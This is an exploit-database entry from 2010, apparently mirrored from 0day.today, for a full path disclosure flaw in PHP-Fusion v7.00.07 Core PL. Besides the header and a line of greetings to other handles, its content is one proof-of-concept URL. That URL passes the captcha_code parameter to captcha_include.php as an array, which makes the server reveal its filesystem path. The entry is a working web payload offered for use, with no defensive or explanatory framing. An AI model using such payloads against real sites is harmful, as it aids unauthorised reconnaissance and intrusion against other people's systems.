id: 11763
date: 04/13/2010
title: PHP-Fusion v7.00.07 Core PL Full Path Disclosure
author: GLOBUS
cves: 

================================================
PHP-Fusion v7.00.07 Core PL Full Path Disclosure
================================================

#########################################################################
# Exploit Title:         PHP-Fusion v7.00.07 Core PL Full Path Disclosure
#
# Software               PHP-Fusion v7.00.07 Core PL
# Date:                  2010-04-13
# Author:                GLOBUS
# Software Link:         http://www.php-fusion.pl
# Version:               v7.00.07
# category:              FPD
#########################################################################

[PFD]
http://localhost/fusion/includes/captcha_include.php?captcha_code[]=

Greetz: hds, Neo, pok3, .xXx., j4ck, Kopaczka, revel004



#  0day.today [2023-03-24]  #